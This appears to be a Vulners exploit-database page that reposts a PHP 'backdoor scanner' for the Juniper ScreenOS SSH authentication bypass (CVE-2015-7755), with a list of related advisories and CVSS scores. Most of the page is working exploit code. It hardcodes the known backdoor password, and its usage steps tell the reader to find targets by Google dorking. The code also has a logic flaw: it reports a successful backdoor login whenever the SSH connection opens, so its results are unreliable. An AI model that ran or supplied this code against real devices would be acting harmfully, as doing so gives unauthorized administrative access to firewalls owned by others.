Vulners
Lucene search
📄 Juniper ScreenOS 6.2.0r15 Backdoor Scanner
| Reporter | Title | Published | Views | Family All 29 |
|---|---|---|---|---|
 | Exploit for Improper Authentication in Juniper Screenos | 9 Jan 201622:49 | – | githubexploit |
 | CVE-2015-7755 | 19 Dec 201500:00 | – | attackerkb |
 | CVE-2015-7755 | 21 Dec 201511:58 | – | circl |
 | Juniper ScreenOS Improper Authentication Vulnerability | 2 Oct 202500:00 | – | cisa_kev |
 | CISA Adds Five Known Exploited Vulnerabilities to Catalog | 2 Oct 202512:00 | – | cisa |
 | Backdoor Vulnerability in Juniper Networks ScreenOS (CNVD-2015-08307) | 21 Dec 201500:00 | – | cnvd |
 | Juniper Networks ScreenOS Authentication Bypass (CVE-2015-7755) | 21 Dec 201500:00 | – | checkpoint_advisories |
 | CVE-2015-7755 | 19 Dec 201511:00 | – | cve |
 | CVE-2015-7755 | 19 Dec 201511:00 | – | cvelist |
 | EUVD-2015-7656 | 7 Oct 202500:30 | – | euvd |
10
=============================================================================================================================================
| # Title : Juniper ScreenOS 6.2.0r15 PHP Backdoor Scanner |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.juniper.net/us/en.html |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: Performs backdoor scanning on Juniper devices via SSH .
The code is now written in PHP and is able to scan devices for the Juniper SSH Backdoor vulnerability in the same way the original code in Metasploit does.
If the code is able to log in using the vulnerability data, it reports the compromised device.
The code runs on any IP you specify when running.
( Related : https://packetstorm.news/files/id/181226/ Related CVE Numbers: CVE-2015-7755 )
[+] save code as poc.php.
[+] Set Target : line 40
[+] USage : php poc.php
[+] PayLoad :
<?php
class JuniperSSHScanner {
private $rport;
private $sshTimeout;
private $sshDebug;
public function __construct($rport = 22, $sshTimeout = 10, $sshDebug = false) {
$this->rport = $rport;
$this->sshTimeout = $sshTimeout;
$this->sshDebug = $sshDebug;
}
public function runHost($ip) {
$username = 'admin';
$password = "<<< %s(un='%s') = %u";
$connection = @ssh2_connect($ip, $this->rport);
if (!$connection) {
echo "[-] فشل الاتصال بـ $ip:$this->rport \n";
return;
}
ssh2_auth_password($connection, $username, $password);
if ($connection) {
echo "[+] تم تسجيل الدخول باستخدام الحساب الخلفي على $ip:$this->rport \n";
$this->reportVuln($ip);
} else {
echo "[-] فشل تسجيل الدخول بـ backdoor على $ip:$this->rport \n";
}
}
private function reportVuln($ip) {
echo "[*] النظام $ip يحتوي على الثغرة المكتشفة!\n";
}
}
// تشغيل الفحص
$scanner = new JuniperSSHScanner();
$scanner->runHost('192.168.1.1');
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Dec 2025 00:00Current
8.2High risk
Vulners AI Score8.2
CVSS 210
CVSS 3.19.8
EPSS0.85797